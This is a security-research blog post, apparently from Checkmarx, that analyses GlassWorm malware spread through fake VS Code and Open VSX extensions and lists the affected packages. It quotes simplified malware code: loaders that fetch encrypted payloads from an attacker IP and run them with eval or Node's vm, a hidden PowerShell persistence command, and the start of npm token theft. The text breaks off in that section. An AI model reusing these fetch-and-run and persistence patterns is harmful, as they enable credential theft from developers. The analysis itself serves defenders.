{"id":107815,"date":"2026-03-23T15:00:00","date_gmt":"2026-03-23T13:00:00","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?post_type=zero-post&#038;p=107815"},"modified":"2026-04-01T16:48:24","modified_gmt":"2026-04-01T14:48:24","slug":"glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/","title":{"rendered":"GlassWorm Targets Developer IDEs Again, Hiding Staged Malware Behind Runtime-Rebuilt Loaders"},"content":{"rendered":"<p>The Checkmarx Zero team recently identified a new set of malicious extensions published to both the VS Code and Open VSX marketplaces, linked to the ongoing GlassWorm campaign we\u2019ve <a href=\"https:\/\/www.linkedin.com\/posts\/checkmarx-zero_glassworm-glassworm-vscode-activity-7394018172636618752-kxTL\/\">previously discussed<\/a> on social media.<\/p>\n\n\n\n<p>What makes this wave notable is the way the GlassWorm campaign continues to evolve while preserving the same core operating model. It\u2019s more than just malicious content in IDE extensions. Instead of compromising an already trusted publisher account, as seen in some earlier incidents, the operators behind this cluster mostly relied on impersonation and lookalike publishing. Several of the extensions mimicked well-known legitimate tools, while others mixed expected functionality with hidden malicious logic to appear credible to developers.<\/p>\n\n\n\n<p>Across all analyzed samples, despite differences in obfuscation and packaging, the malicious code ultimately converged on the same staged execution flow. The extensions rebuilt Solana RPC infrastructure at runtime, recovered next-stage payload locations from Solana memos, applied regional evasion checks, and dynamically executed additional payloads.<\/p>\n\n\n\n<p>This behavior closely aligns with previously reported GlassWorm activity. In fact, one of the VS Code samples still used invisible Unicode concealment and reused a Solana wallet address seen in earlier campaigns, providing a direct link to prior GlassWorm variants.<\/p>\n\n\n\n<p>In total, the 13 malicious extensions identified in this cluster accumulated almost 50k downloads.
Although the samples used different runtime decoding chains, they all converged on the same underlying execution flow.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"Affected-extensions\">GlassWorm infected extensions list<\/h2>\n\n\n\n<p>The following GlassWorm-related extensions were identified as having this particular delivery mechanism:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody>\n<tr>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Extension<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Version<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Platform<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Downloads<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Release Date<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Impersonation<\/strong><\/th>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">pyscopexte.pyscope-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.1.403<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">4208<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 3, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">aligntool.extension-align-professional-tool<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.4.6<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">3168<\/td>\n<td class=\"has-text-align-left\"
data-align=\"left\">Mar 5, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/chouzz\/vscode-better-align\">chouzz.vscode-better-align<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">rubyideext.ruby-ide-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.10.0-alpha.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1158<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 5, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">runnerpost.runner-your-code<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.13.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">4300<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 5, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/formulahendry\/code-runner\">formulahendry.code-runner<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">aadarkcode.one-dark-material<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">3.20.1<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">7768<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/zhuangtongfa\/material-theme\">zhuangtongfa.material-theme<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">lyu-wen-studio-web-han.better-formatter-vscode<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.1.6<\/td>\n<td class=\"has-text-align-left\" 
data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">10495<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/lyuwenhan\/code-formatter-and-minifier\">lyuwenhan.code-formatter-and-minifier<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">kwitch-studio.auto-run-command-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.6.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">7805<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/synedra\/auto-run-command\">synedra.auto-run-command<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">dopbop-studio.vscode-tailwindcss-extension-toolkit<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.14.29<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">5664<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/bradlc\/vscode-tailwindcss\">bradlc.vscode-tailwindcss<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">blockstoks.easily-gitignore-manage<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.10.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">938<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 9, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a 
href=\"https:\/\/open-vsx.org\/extension\/codezombiech\/gitignore\">codezombiech.gitignore<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">federicanc.dotenv-syntax-highlighting<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.0.3<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">2100<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 10, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">myexttool.my-command-palette-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.0.4<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">320<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 12, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">pessa07tm.my-js-ts-auto-commands<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.0.4<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1824<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 12, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">silvia68.console-log-generator<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.0.1<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">254<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 17, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<\/tbody><\/table><\/figure>\n\n\n\n<p>The above is a list of 
packages using this novel technique for infection and stealth, and <strong>not a comprehensive list of GlassWorm campaign packages<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-1\">Technical Analysis<\/h2>\n\n\n\n<p>GlassWorm is a self-propagating program that infects developer workstations, primarily through Visual Studio Code extensions. A developer who installs an infected extension can expect credentials for things like cryptocurrency wallets, GitHub, and various package registries (like npm, PyPI, etc.) to be exfiltrated. The GlassWorm malware also attempts to establish a level of remote access for the attacker, allowing the attacker to use the developer\u2019s machine as a proxy for future attack activities. The infection proceeds in three stages:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\n<strong>Stage 0<\/strong> establishes the infection, installs and configures infrastructure for delivering the core payload, etc.<\/li>\n\n\n\n<li>\n<strong>Stage 1<\/strong> downloads the core payload from the internet, obfuscates its activity, harvests developer credentials, and prepares the infected machine for the final stage.<\/li>\n\n\n\n<li>\n<strong>Stage 2<\/strong> exfiltrates recovered credentials and other sensitive data to the attacker, compromises browser data, and establishes persistent access for future use by the attacker.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"Stage-0\">Stage 0<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Runtime-reconstruction-of-Solana-infrastructure\">Runtime reconstruction of Solana infrastructure<\/h3>\n\n\n\n<p>A problem malware often runs into when trying to infect target machines is that defenders eventually identify the endpoints the malware intends to use for exfiltration, and then block scripts and executables that contain references to those endpoints.<\/p>\n\n\n\n<p>The first stage of the GlassWorm malware is designed to reduce early detection by dynamically reconstructing
a list of <a href=\"https:\/\/solana.com\/docs\/references\/clusters\">Solana JSON-RPC<\/a> endpoints and using them to query on-chain transaction data instead of relying on hardcoded infrastructure. This allows the malware to interact with Solana nodes through the standard RPC interface while avoiding a static list of endpoints that defenders could more easily flag. Across the samples, this is done through layered obfuscation, such as rotated string arrays, wrapper lookup functions, and custom decoders. While the exact implementation differs from one extension to another, the result is the same: the malware reproduces a list of Solana RPC providers and uses them as attack infrastructure without triggering most kinds of early-detection tools:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">\/\/ 
resolves to:\r\n\/\/ https:\/\/api.mainnet-beta.solana.com\r\n\r\nfunction m(C, s, S, V) {\r\n  return A(C - 0x56, s - 0x47, s, C - -0xcc);\r\n}\r\n\r\nconst endpoint =\r\n  m(0x15, &#039;Opf5&#039;, -0x2d, 0x57) +\r\n  m(0x77, &#039;Ib0M&#039;, 0x76, 0x5b) +\r\n  &#039;beta.solan&#039; +\r\n  &#039;a.com&#039;;\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The full endpoint list resolves to multiple Solana RPC providers:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>https[:]\/\/api[.]mainnet-beta[.]solana[.]com<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana-mainnet[.]gateway[.]tatum[.]io<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/go[.]getblock[.]us\/86aac42ad4484f3c813079afc201451c<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana-rpc[.]publicnode[.]com<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/api[.]blockeden[.]xyz\/solana\/KeCh6p22EX5AeRHxMSmc<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]drpc[.]org<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]leorpc[.]com\/?api_key=FREE<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]api[.]onfinality[.]io\/public<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]api[.]pocket[.]network\/<\/code><\/li>\n<\/ul>\n\n\n\n<p>The malware iterates through these providers using a fallback infrastructure pattern: if one endpoint is unreachable or returns an error, it catches the exception, pauses briefly, and tries the next provider in the list.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Solana address reconstruction and RPC query<\/h3>\n\n\n\n<p>Once the Solana RPC infrastructure is rebuilt, GlassWorm uses a hardcoded (but obfuscated) wallet address to request transaction metadata through JSON-RPC. 
The returned address is then queried to find transactions with memo data.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">\/\/ resolves to:\r\n\/\/ 6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ\r\n\r\nfunction y(C, s, S, V) {\r\n  return D(C - -0x380, s);\r\n}\r\n\r\nfunction x(C, s, S, V) {\r\n  return D(s - 0x40, S);\r\n}\r\n\r\nconst solanaAddress =\r\n  x(0x1da, 0x1f0, &#039;&amp;sYe&#039;, 0x230) +\r\n  y(-0x185, &#039;MxE^&#039;, -0x150, -0x196) +\r\n  y(-0x17b, &#039;vx&amp;D&#039;, -0x122, -0x196) +\r\n  y(-0x1ae, &#039;cRN$&#039;, -0x202, -0x19a) +\r\n  x(0x25e, 0x256, &#039;g^B&amp;&#039;, 0x22f);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div
class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Regional checks<\/h3>\n\n\n\n<p>Before continuing, the loader checks whether the system looks like it belongs to a user in Russia. It examines environment variables, language and locale settings, timezone information, and the UTC offset for signs of a Russian environment. That includes values like <kbd>ru_RU<\/kbd>, <kbd>ru-RU<\/kbd>, <kbd>Russian<\/kbd>, and <kbd>russian<\/kbd>, as well as timezones and UTC offsets commonly associated with Russia. Altogether, these checks suggest the loader is designed to avoid execution on systems linked to Russia.<\/p>\n\n\n\n<p>This pattern is common among threat actors who operate from within Russian territories, as it avoids attracting in-country investigation. It\u2019s much easier for an attacker\u2019s own country to investigate and prosecute an attacker than it is for a foreign country. 
However, this signal should not be taken as conclusive proof or attribution.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">function T() {\r\n  let localeIndicators = [\r\n    os.userInfo().username,\r\n    process.env.LANGUAGE,\r\n    process.env.LANG,\r\n    process.env.LC_ALL,\r\n    Intl.DateTimeFormat().resolvedOptions().locale\r\n  ].some(v =&gt; v &amp;&amp; \/ru_RU|ru-RU|Russian|russian\/i.test(v));\r\n\r\n  let timezoneIndicators = [\r\n    Intl.DateTimeFormat().resolvedOptions().timeZone,\r\n    new Date().toString()\r\n  ];\r\n\r\n  let russianTimezones = [\r\n    &quot;Europe\/Moscow&quot;,\r\n    &quot;Europe\/Samara&quot;,\r\n    &quot;Asia\/Novosibirsk&quot;,\r\n    &quot;Asia\/Yekaterinburg&quot;,\r\n    &quot;Asia\/Omsk&quot;,\r\n    &quot;Asia\/Krasnoyarsk&quot;,\r\n    
&quot;Asia\/Irkutsk&quot;,\r\n    &quot;Asia\/Vladivostok&quot;,\r\n    &quot;Asia\/Magadan&quot;,\r\n    &quot;Asia\/Kamchatka&quot;,\r\n    &quot;Asia\/Anadyr&quot;,\r\n    &quot;MSK&quot;\r\n  ];\r\n\r\n  let timezoneMatch = timezoneIndicators.some(v =&gt;\r\n    v &amp;&amp; russianTimezones.some(tz =&gt; v.toLowerCase().includes(tz.toLowerCase()))\r\n  );\r\n\r\n  let utcOffset = -new Date().getTimezoneOffset() \/ 60;\r\n  let offsetMatch = utcOffset &gt;= 2 &amp;&amp; utcOffset &lt;= 12;\r\n\r\n  return localeIndicators &amp;&amp; (timezoneMatch || offsetMatch);\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Memo-based payload discovery<\/h3>\n\n\n\n<p>The RPC response returns transactions with JSON in the memo field. 
The malware reads that data to identify the next-stage location, so it can fetch payload infrastructure from the blockchain instead of storing it directly inside the extension.<\/p>\n\n\n\n<p>Partial memo:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"json\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-json\">{\r\n  &quot;jsonrpc&quot;: &quot;2.0&quot;,\r\n  &quot;result&quot;: [\r\n    {\r\n      &quot;blockTime&quot;: 1772540446,\r\n      &quot;confirmationStatus&quot;: &quot;finalized&quot;,\r\n      &quot;err&quot;: null,\r\n      &quot;memo&quot;: &quot;[79] {\\&quot;link\\&quot;:\\&quot;aHR0cDovLzQ1LjMyLjE1MC4yNTEvOGdCd3hFcTRodmF1OGhydGVIUXNFUSUzRCUzRA==\\&quot;}&quot;,\r\n      &quot;signature&quot;: &quot;2zJq487NsyNPZP3kAjUC76jayqjivVH5bJBELSCKSaNa49XJgoUmz3bp6Y9A9NZFZ8V86YVAogdziNu6ao2Z1AYW&quot;,\r\n      &quot;slot&quot;:
403936731\r\n    }\r\n  ],\r\n  &quot;id&quot;: 1\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The extension then extracts the first memo value and resolves it to:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"json\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-json\">{ &quot;link&quot;: &quot;aHR0cDovLzQ1LjMyLjE1MC4yNTEvOGdCd3hFcTRodmF1OGhydGVIUXNFUSUzRCUzRA==&quot; }<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The RPC response contains multiple 
transactions with memo data, but the malware only uses the first one it finds to resolve the next stage. Those memo values point to different stage-delivery hosts, including <kbd><code>45[.]32[.]150[.]251<\/code><\/kbd>, <kbd><code>45[.]32[.]151[.]157<\/code><\/kbd>, and <kbd><code>70[.]34[.]242[.]255<\/code><\/kbd>, which may suggest the infrastructure changed or rotated over time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Retrieval of the next-stage payload<\/h3>\n\n\n\n<p>After parsing the memo JSON, the loader decodes the <code>link<\/code> field and uses it for the next request:<\/p>\n\n\n\n<p><code>http[:]\/\/45[.]32[.]150[.]251\/8gBwxEq4hvau8hrteHQsEQ%3D%3D<\/code><\/p>\n\n\n\n<p>The server responds with encoded content in the body and additional response headers, <code>secretkey<\/code> and <code>ivbase64<\/code>, whose values are later used to decrypt the AES-encrypted executable payload before execution.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Execution<\/h3>\n\n\n\n<p>Once the payload is retrieved, the malware dynamically executes it at runtime. The execution method varies depending on simple conditions in the loader. The loader first checks whether the recovered payload is exactly 20 characters long and, if so, immediately decodes and executes it via <code>eval(atob(...))<\/code>. In the analyzed sample, the payload did not meet that condition and was substantially larger, suggesting that this branch could have been for an alternate payload format or fallback response that we have yet to see.<\/p>\n\n\n\n<p>If that condition isn\u2019t met, the malware then checks the operating system. 
On macOS (darwin) it still uses the direct eval path, whereas on other platforms it creates a separate execution context and runs the payload through Node.js\u2019s vm module instead, with runtime capabilities such as require, Buffer, process, console, and timer functions.<\/p>\n\n\n\n<p>A representation of that logic is shown below:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">if (Z?.length == 0x14) {\r\n  eval(atob(Z));\r\n  return;\r\n}\r\n\r\nif (O.platform() == &quot;darwin&quot;) {\r\n  let _iv = Buffer.from(K, &quot;base64&quot;);\r\n  eval(atob(Z));\r\n} else {\r\n  let d = require(&quot;vm&quot;);\r\n  let t = {\r\n    require,\r\n    Buffer,\r\n    process,\r\n    console,\r\n    setTimeout,\r\n    setImmediate,\r\n    clearTimeout,\r\n    setInterval,\r\n    clearInterval\r\n  };\r\n\r\n  d.createContext(t);\r\n  new d.Script(dynamicSource).runInContext(t);\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-2\">Stage 1<\/h2>\n\n\n\n<p>The recovered second-stage payload shows that the initial stage is not just fetching another script. It is delivering a broader credential theft, wallet theft, persistence, and exfiltration implant.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Stage delivery of GlassWorm components through a public Google Calendar page<\/h3>\n\n\n\n<p>A clear connection between the first stage loader and the recovered payload is that the second stage keeps the same indirection pattern. It retrieves a value from a public page, decodes it, and then uses it to fetch the next payload.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">osAtlakAnH(\r\n  atob(&#039;aHR0cHM6Ly9jYWxlbmRhci5hcHAuZ29vZ2xlLzJOa3JjS0tqNFQ2RG40dUs2&#039;),\r\n  (err, link) =&gt; niEGcybV(atob(link), niEGcybVCall)\r\n);\r\n\r\nfunction niEGcybV(slug, callback) {\r\n  http.get(&#039;http:\/\/45.32.150.251&#039; + slug, (response) =&gt; {\r\n    callback(null, {\r\n      script: data,\r\n      iv: response.headers.ivbase64,\r\n      secretKey: response.headers.secretkey\r\n    });\r\n  });\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>Here, the payload first fetches a Google Calendar-hosted page, extracts a data-base-title attribute, decodes it, and then appends the result to <code>http[:]\/\/45[.]32[.]150[.]251<\/code>. The server response body contains the next script, while the ivbase64 and secretkey headers provide the material needed for later decryption.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Embedded persistence and local staging<\/h3>\n\n\n\n<p>At this stage, the malware also establishes persistence on the victim system. 
It writes files under the user&#8217;s profile directory, drops a PowerShell script, and launches a hidden startup chain using:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">const folderName = &#039;ozTjbCl&#039;;\r\nconst ps1name = &#039;mwSMNWQsh&#039;;\r\nconst folderPath = path.join(appdataDir, folderName);\r\nconst filePath = path.join(folderPath, &#039;index.js&#039;);\r\n\r\nfs.writeFileSync(filePath, script);\r\nfs.writeFileSync(ps1Path, scriptPS1(filePath, nodePath, ps1Path), &#039;utf-8&#039;);\r\nchildProcess.exec(\r\n  `start \/B powershell.exe -ExecutionPolicy Bypass -Command &quot;&amp; { . 
&#039;${ps1Path}&#039; }&quot; -WindowStyle Hidden`,\r\n  { detached: true, stdio: &#039;ignore&#039; }\r\n);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">npm token theft<\/h3>\n\n\n\n<p>The malware searches for npm authentication tokens through several methods, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>npm configuration<\/li>\n\n\n\n<li>.npmrc files<\/li>\n\n\n\n<li>environment variables<\/li>\n<\/ul>\n\n\n\n<p>If a token is found, it is verified through the npm registry using <code>https[:]\/\/registry[.]npmjs[.]org\/-\/whoami<\/code><\/p>\n\n\n\n<p>This is a strong indication that the campaign is not just interested in generic system data or wallets, but also in developer publishing credentials that could be reused for further supply-chain abuse.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" 
